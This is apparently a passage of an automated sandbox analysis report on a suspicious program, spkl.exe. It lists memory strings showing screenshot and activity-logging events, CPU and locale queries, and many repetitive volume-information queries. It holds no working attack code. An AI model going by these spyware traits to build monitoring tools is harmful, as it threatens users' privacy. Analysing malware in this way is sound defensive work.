Source: spkl.exe, 00000038.00000003.2640368617.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2626314828.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000038.00000003.2657973984.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +2024-10-02 00:13:09.353{"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000003.2626314828.0000000004FE7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2726418979.0000000001755000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +2024-10-02 00:13:09.353{"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}ubertQ
Source: spkl.exe, 00000038.00000003.2626606901.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:13:09.353{"sTime":"2024-10-02 00:13:09.353","sdTime":"45567.0091360301","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000038.00000002.2750231481.0000000006AE8000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: [{"sTime":"2024-10-02 00:12:55.213","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"APP","SApp":"chrome.exe","sTitle":"Dashboard - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:13:07.303","sEvent":"PRG_RUN","SApp":"chrome.exe","sTitle":"Google Chrome","SValue":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","sUser":"user"},{"sTime":"2024-10-02 00:13:09.353","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:13:10.127","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:13:12.877","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}]U

Contains functionality to query CPU information (cpuid)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 71_2_0051EE90 cpuid

71_2_0051EE90

Contains functionality to query locales information (e.g. system language)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	56_2_0040AD50
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	56_2_0040A298
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	56_2_03374CB8
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: lstrcpy,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,lstrcpy,LoadLibraryExA,	56_2_03374D8A
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Code function: GetLocaleInfoA,	56_2_03379C9C

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-227NI.tmp\[space]= .tmp	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
